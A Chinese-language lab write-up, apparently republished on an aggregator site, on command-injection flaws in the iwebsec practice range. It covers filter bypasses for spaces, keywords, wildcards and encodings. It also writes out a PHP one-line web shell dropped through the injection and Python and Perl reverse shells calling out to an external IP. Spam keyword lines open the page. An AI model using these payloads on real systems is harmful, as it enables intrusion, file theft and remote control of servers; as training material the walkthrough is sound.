国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

命令執(zhí)行漏洞 | iwebsec

這篇具有很好參考價(jià)值的文章主要介紹了命令執(zhí)行漏洞 | iwebsec。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

1 靶場(chǎng)環(huán)境

這是 iwebsec 靶場(chǎng),具體搭建過(guò)程可以看前面的文章。

命令執(zhí)行漏洞,web安全,php,安全,web安全

2 命令執(zhí)行漏洞介紹

應(yīng)用程序有時(shí)需要調(diào)用一些執(zhí)行系統(tǒng)命令的函數(shù),如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函數(shù)執(zhí)行系統(tǒng)命令。當(dāng)黑客能控制這些函數(shù)中的參數(shù)時(shí),就可以將惡意的系統(tǒng)命令拼接到正常的命令中,從而造成命令執(zhí)行攻擊,這就是命令執(zhí)行漏洞?!菊浴秝eb安全攻防》】

Windows系統(tǒng)支持的管道符:

管道符 作用 舉例
| 直接執(zhí)行后面的命令。 命令執(zhí)行漏洞,web安全,php,安全,web安全
|| 前面執(zhí)行的命令執(zhí)行出錯(cuò)才執(zhí)行后面的語(yǔ)句。 命令執(zhí)行漏洞,web安全,php,安全,web安全
& 前面的語(yǔ)句無(wú)論真假都可以執(zhí)行后面的語(yǔ)句。(無(wú)條件執(zhí)行后面的語(yǔ)句,推薦使用。) 命令執(zhí)行漏洞,web安全,php,安全,web安全
&& 前面語(yǔ)句為真才能執(zhí)行后面的語(yǔ)句。 命令執(zhí)行漏洞,web安全,php,安全,web安全

Linux系統(tǒng)支持的管道符:

管道符 作用 舉例
| 顯示后面語(yǔ)句的執(zhí)行結(jié)果。 命令執(zhí)行漏洞,web安全,php,安全,web安全
; 執(zhí)行完前面的語(yǔ)句再執(zhí)行后面的。 命令執(zhí)行漏洞,web安全,php,安全,web安全
|| 前面語(yǔ)句執(zhí)行錯(cuò)誤才執(zhí)行后面的語(yǔ)句。 命令執(zhí)行漏洞,web安全,php,安全,web安全
& 前面語(yǔ)句無(wú)論真假都會(huì)執(zhí)行后面的語(yǔ)句。(無(wú)條件執(zhí)行后面的語(yǔ)句,推薦使用。) 命令執(zhí)行漏洞,web安全,php,安全,web安全
&& 前面的語(yǔ)句為真才能執(zhí)行后面的語(yǔ)句。 命令執(zhí)行漏洞,web安全,php,安全,web安全

3 靶場(chǎng)練習(xí)

01-命令執(zhí)行漏洞

打開(kāi)靶場(chǎng),直接測(cè)試。使用|。

命令執(zhí)行漏洞,web安全,php,安全,web安全

使用;

命令執(zhí)行漏洞,web安全,php,安全,web安全

使用||。

命令執(zhí)行漏洞,web安全,php,安全,web安全

使用cat命令獲取文件。

命令執(zhí)行漏洞,web安全,php,安全,web安全

看網(wǎng)頁(yè)源碼,發(fā)現(xiàn)cat到文件源碼。

命令執(zhí)行漏洞,web安全,php,安全,web安全

獲取/etc/passwd文件。

命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞代碼分析

服務(wù)端處理 ping ,程序獲取GET參數(shù)IP,然后拼接到system() 函數(shù)中,利用 system() 函數(shù)執(zhí)行ping的功能,但此處沒(méi)有對(duì)參數(shù)IP做過(guò)濾和檢測(cè),導(dǎo)致可以利用管道符執(zhí)行其他的系統(tǒng)命令。

<?php
  require_once('../header.php');
?>

<html>
	<head>
		<title>命令執(zhí)行漏洞</title>
	</head>
	<h2>命令執(zhí)行漏洞</h2>
		<div class="alert alert-success">
			<p>/01.php?ip=127.0.0.1 </p>
		</div>
	<body>

<?php
	if(isset($_GET['ip'])){
	    $ip = $_GET['ip'];//用戶可以控制
	    system("ping -c 2 ".$ip);//system系統(tǒng)命令,沒(méi)有限制
	}else{
		exit();
	}
?>

02-命令執(zhí)行漏洞空格繞過(guò)

命令執(zhí)行漏洞,web安全,php,安全,web安全

過(guò)濾了空格,可以去掉空格。

命令執(zhí)行漏洞,web安全,php,安全,web安全

管道符兩邊的空格可以去除。但是有些是不能去除的,比如cat /ect/passwd,我們可以想辦法繞過(guò)空格:

  1. 使用%09%09是tab鍵的url編碼。
    命令執(zhí)行漏洞,web安全,php,安全,web安全

  2. 使用<,< 表示的是輸入重定向的意思,就是把<后面跟的文件取代鍵盤作為新的輸入設(shè)備?!懊?< 文件” ,這是將文件作為命令輸入。
    命令執(zhí)行漏洞,web安全,php,安全,web安全

  3. 使用{},用,實(shí)現(xiàn)空格可能。
    命令執(zhí)行漏洞,web安全,php,安全,web安全

  4. 使用${IFS}
    命令執(zhí)行漏洞,web安全,php,安全,web安全

  5. 使用$IFS$9
    命令執(zhí)行漏洞,web安全,php,安全,web安全

源碼分析

<?php
	if(isset($_GET['ip'])){
		if (preg_match('/ /', $_GET['ip'])) {  //匹配空格
                die('error!!!');
		}
		else{
			$ip = $_GET['ip'];
		}
    system("ping -c 2 ".$ip);
	}else{
		exit();
	}
?>

03-命令執(zhí)行漏洞關(guān)鍵命令繞過(guò)

命令執(zhí)行漏洞,web安全,php,安全,web安全

cat命令的繞過(guò):

  1. 使用常規(guī)繞過(guò)

命令執(zhí)行漏洞,web安全,php,安全,web安全
命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞,web安全,php,安全,web安全
命令執(zhí)行漏洞,web安全,php,安全,web安全
命令執(zhí)行漏洞,web安全,php,安全,web安全
命令執(zhí)行漏洞,web安全,php,安全,web安全

  1. 非常規(guī)操作

命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞,web安全,php,安全,web安全

其他的試了,不行。我用自己的Linux系統(tǒng)試試:

命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞,web安全,php,安全,web安全

  1. 使用符號(hào)及拼接

命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞,web安全,php,安全,web安全

源碼分析

<?php
	if(isset($_GET['ip'])){
		if (preg_match('/cat/', $_GET['ip'])) {  //過(guò)濾了cat
                die('error!!!');
		}
		else{
			$ip = $_GET['ip'];		
		}
    system("ping -c 2 ".$ip);
	}else{
		exit();
	}	
?>

04-命令執(zhí)行漏洞通配符繞過(guò)

<?php
	if(isset($_GET['ip'])){
		if (preg_match('/etc|passwd/', $_GET['ip'])) {
                die('error!!!');
		}
		else{
			$ip = $_GET['ip'];	
		}
    system("ping -c 2 ".$ip);
	}else{
		exit();
	}
?>

看源碼只是過(guò)濾了/etc/passwd文件,讀取其他文件是沒(méi)有問(wèn)題的:

命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞,web安全,php,安全,web安全

但我就是要讀取/etc/passwd文件呢?

  1. 可以使用通配符繞過(guò):

通配符是一種特殊語(yǔ)句,主要有星號(hào)(*)和問(wèn)號(hào)(?),用來(lái)模糊搜索文件。當(dāng)查找文件夾時(shí),可以使用它來(lái)代替一個(gè)或多個(gè)真正字符;當(dāng)不知道真正字符或者懶得輸入完整名字時(shí),常常使用通配符代替一個(gè)或多個(gè)真正的字符。 【百度百科】

命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞,web安全,php,安全,web安全

  1. 使用符號(hào)及拼接

命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞,web安全,php,安全,web安全

05-命令執(zhí)行漏洞base64編碼繞過(guò)

命令執(zhí)行漏洞,web安全,php,安全,web安全

直接就可以RCE,看一下源碼:

<?php
	if(isset($_GET['ip'])){
		if (preg_match('/id/', $_GET['ip'])) {
                die('error!!!');
		}
		else{
			$ip = $_GET['ip'];
			
		}
    system("ping -c 2 ".$ip);
	}else{
		exit();
	}
?>

過(guò)濾了id這個(gè)關(guān)鍵字,Linux id命令用于顯示用戶的ID,以及所屬群組的ID。

命令執(zhí)行漏洞,web安全,php,安全,web安全

使用base64編碼繞過(guò):

echo aWQ= | base64 -d 

命令執(zhí)行漏洞,web安全,php,安全,web安全

第一個(gè)例子直接輸出為id,第二個(gè)例子加了反引號(hào)`則會(huì)執(zhí)行輸出的內(nèi)容,即執(zhí)行命令id

命令執(zhí)行漏洞,web安全,php,安全,web安全

除了base64,我們可以使用hex編碼:

ip=127.0.0.1 | echo "6964" | xxd -r -p | bash
ip=127.0.0.1 | `echo "6964" | xxd -r -p`

命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞,web安全,php,安全,web安全

第一句直接輸出id,第二句將輸出的內(nèi)容傳進(jìn)bash執(zhí)行。也可以不用bash執(zhí)行,直接用反引號(hào)執(zhí)行。

命令執(zhí)行漏洞,web安全,php,安全,web安全

讀取/etc/passwd文件:

命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞,web安全,php,安全,web安全

4 命令執(zhí)行漏洞危害

以第一關(guān)的環(huán)境為例,進(jìn)行下面的實(shí)驗(yàn)。

01-讀寫(xiě)系統(tǒng)文件

命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞,web安全,php,安全,web安全

02-執(zhí)行系統(tǒng)命令

常見(jiàn)linux系統(tǒng)命令大全

使用touch命令新建一個(gè)文件

命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞,web安全,php,安全,web安全

pwd查看當(dāng)前目錄的位置

命令執(zhí)行漏洞,web安全,php,安全,web安全

使用find命令搜索符合條件的文件

命令執(zhí)行漏洞,web安全,php,安全,web安全

顯示指定目錄下所有目錄和文件,包括隱藏文件

命令執(zhí)行漏洞,web安全,php,安全,web安全

03-種植惡意木馬

寫(xiě)入一句話木馬

?ip=127.0.0.1|echo '<?php @eval($_POST['a']);?>' >2.php

命令執(zhí)行漏洞,web安全,php,安全,web安全

連接一句話木馬

命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞,web安全,php,安全,web安全

用蟻劍連接

命令執(zhí)行漏洞,web安全,php,安全,web安全

04-反彈shell

RCE/命令執(zhí)行漏洞反彈shell小結(jié)。這里使用第三關(guān)環(huán)境,第一關(guān)被我改壞了。

我用bash反彈,一直寫(xiě)不進(jìn)去,但是一句話木馬又可以寫(xiě)入,按照源碼只是對(duì)cat進(jìn)行過(guò)濾而已,應(yīng)該沒(méi)有過(guò)濾其他東西了。試著把反彈shell逐個(gè)拆開(kāi)寫(xiě)進(jìn)去:

命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞,web安全,php,安全,web安全

那應(yīng)該是不能有&,所以bashphp的反彈shell語(yǔ)句都用不了。而python的反彈shell語(yǔ)句剛好沒(méi)有:

python反彈shell
注入點(diǎn):127.0.0.1|python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("8.134.148.36",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
監(jiān)聽(tīng)點(diǎn):nc -lvp 7777

命令執(zhí)行漏洞,web安全,php,安全,web安全
命令執(zhí)行漏洞,web安全,php,安全,web安全

perl反彈shell
注入點(diǎn):127.0.0.1|perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"8.134.148.36:6666");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
監(jiān)聽(tīng)點(diǎn):nc -lvp 6666

命令執(zhí)行漏洞,web安全,php,安全,web安全

命令執(zhí)行漏洞,web安全,php,安全,web安全文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-819685.html

到了這里,關(guān)于命令執(zhí)行漏洞 | iwebsec的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【網(wǎng)絡(luò)安全】命令執(zhí)行漏洞

    【網(wǎng)絡(luò)安全】命令執(zhí)行漏洞

    應(yīng)用程序中有時(shí)候需要調(diào)用一些執(zhí)行系統(tǒng)命令的函數(shù),在php中常見(jiàn)的為 system 、 exec 、 shell_exec 、 passthru 、 proc_poen 、 popen 等函數(shù)用來(lái)執(zhí)行系統(tǒng)命令。當(dāng)黑客能控制這些函數(shù)的參數(shù)時(shí),就可以講惡意的系統(tǒng)命令拼接到正常的命令中,就會(huì)命令執(zhí)行攻擊,這就是命令執(zhí)行漏洞。

    2024年02月03日
    瀏覽(31)
  • 【W(wǎng)eb】CTFSHOW PHP命令執(zhí)行刷題記錄(全)

    【W(wǎng)eb】CTFSHOW PHP命令執(zhí)行刷題記錄(全)

    目錄 web29 web30 web31 web32 web33 web34 web35 web36 web37-39 web40 web41 (y4?腳本) web42 -44 web45 web46 -49 web50 web51 web52 web53 web54 web55-56 web57 web58 web59 web60 web61 web62 web63-65 web66-67 web68-70 web71 web72 web73-74 web75-76 web77 期末復(fù)習(xí)不了一點(diǎn),不如做點(diǎn)舊題醒一醒手感。每一題都盡量用不同payload,如果

    2024年01月23日
    瀏覽(21)
  • 多個(gè)安全廠商安全設(shè)備 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    多個(gè)安全廠商安全設(shè)備 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    此文章僅用于技術(shù)交流,嚴(yán)禁用于對(duì)外發(fā)起惡意攻擊?。?! 該漏洞可執(zhí)行遠(yuǎn)程代碼 FOFA:body=“/webui/images/default/default/alert_close.jpg”

    2024年02月03日
    瀏覽(20)
  • 數(shù)據(jù)庫(kù)安全:Hadoop 未授權(quán)訪問(wèn)-命令執(zhí)行漏洞.

    數(shù)據(jù)庫(kù)安全:Hadoop 未授權(quán)訪問(wèn)-命令執(zhí)行漏洞.

    Hadoop 未授權(quán)訪問(wèn)主要是因?yàn)?Hadoop YARN 資源管理系統(tǒng)配置不當(dāng),導(dǎo)致可以未經(jīng)授權(quán)進(jìn)行訪問(wèn),從而被攻擊者惡意利用。攻擊者無(wú)需認(rèn)證即可通過(guò) RESTAPI 部署任務(wù)來(lái)執(zhí)行任意指令,最終完全控制服務(wù)器。 數(shù)據(jù)庫(kù)安全:Hadoop 未授權(quán)訪問(wèn)-命令執(zhí)行漏洞. Hadoop 未授權(quán)訪問(wèn)-命令執(zhí)行漏

    2024年02月05日
    瀏覽(23)
  • [JAVA安全]CVE-2022-33980命令執(zhí)行漏洞分析

    [JAVA安全]CVE-2022-33980命令執(zhí)行漏洞分析

    在 i春秋的漏洞靶標(biāo)上看見(jiàn)了此漏洞,所以前來(lái)分析一下漏洞原理,比較也是去年 7月的漏洞。 漏洞描述:Apache官方發(fā)布安全公告,修復(fù)了一個(gè)存在于Apache Commons Configuration 組件的遠(yuǎn)程代碼執(zhí)行漏洞,漏洞編號(hào):CVE-2022-33980,漏洞威脅等級(jí):高危。惡意攻擊者通過(guò)該漏洞,可在

    2024年02月15日
    瀏覽(22)
  • 命令執(zhí)行漏洞--ibos靶場(chǎng)(靶場(chǎng)環(huán)境是掌控安全的)

    命令執(zhí)行漏洞--ibos靶場(chǎng)(靶場(chǎng)環(huán)境是掌控安全的)

    命令執(zhí)行:用戶傳入的參數(shù),會(huì)被當(dāng)成系統(tǒng)指令來(lái)執(zhí)行,指令內(nèi)容用戶可控,屬于代碼執(zhí)行的一種 ctrl+u:在view-source模式自動(dòng)換行 危險(xiǎn)函數(shù) 1. system()函數(shù):直接執(zhí)行命令,并且輸出 2. exec()函數(shù):默認(rèn)顯示最后一行結(jié)果,沒(méi)有輸出 3. shell_exec()函數(shù):多行結(jié)果,沒(méi)有輸出 4. pa

    2024年04月16日
    瀏覽(22)
  • 安恒信息-明御安全網(wǎng)關(guān) 命令執(zhí)行漏洞分析

    目錄 注意 漏洞描述 漏洞位置 漏洞代碼 POC: 由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),文章作者不為此承擔(dān)任何責(zé)任。 安恒信息-明御安全網(wǎng)關(guān)存在命令執(zhí)行漏洞,導(dǎo)致攻擊者可以直接執(zhí)行系統(tǒng)命令,從而控制目標(biāo)系

    2024年02月12日
    瀏覽(24)
  • 億賽通電子文檔安全管理系統(tǒng)遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    億賽通電子文檔安全管理系統(tǒng)遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    此文章僅用于技術(shù)交流,嚴(yán)禁用于對(duì)外發(fā)起惡意攻擊!??! 億賽通電子文檔安全管理系統(tǒng)(簡(jiǎn)稱:CDG)是一款電子文檔安全加密軟件,該系統(tǒng)利用驅(qū)動(dòng)層透明加密技術(shù),通過(guò)對(duì)電子文檔的加密保護(hù),防止內(nèi)部員工泄密和外部人員非法竊取企業(yè)核心重要數(shù)據(jù)資產(chǎn),對(duì)電子文檔進(jìn)

    2024年01月21日
    瀏覽(23)
  • 思福迪 運(yùn)維安全管理系統(tǒng) test_qrcode_b 遠(yuǎn)程命令執(zhí)行漏洞

    思福迪 運(yùn)維安全管理系統(tǒng) test_qrcode_b 遠(yuǎn)程命令執(zhí)行漏洞

    免責(zé)聲明:請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所產(chǎn)生的一切不良后果與文章作者無(wú)關(guān)。該文章僅供學(xué)習(xí)用途使用。 思福迪運(yùn)維安全管理系統(tǒng)是思福迪開(kāi)發(fā)的一

    2024年02月04日
    瀏覽(19)
  • web安全-文件上傳漏洞-圖片馬制作-相關(guān)php函數(shù)講解-upload靶場(chǎng)通關(guān)詳細(xì)教學(xué)(3)

    web安全-文件上傳漏洞-圖片馬制作-相關(guān)php函數(shù)講解-upload靶場(chǎng)通關(guān)詳細(xì)教學(xué)(3)

    制作圖片馬有兩種方法,一種是文本方式打開(kāi),末尾粘貼一句話木馬,令一種是使用命令進(jìn)行合成。 方法1 首先準(zhǔn)備好一個(gè)圖片(這里是1.png)。 將一個(gè)圖片以文本格式打開(kāi)(這里用的Notepad++,以記事本方式打開(kāi)修改也能連接成功,不過(guò)修改后圖片無(wú)法正常顯示了)。 后面粘

    2024年02月06日
    瀏覽(20)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包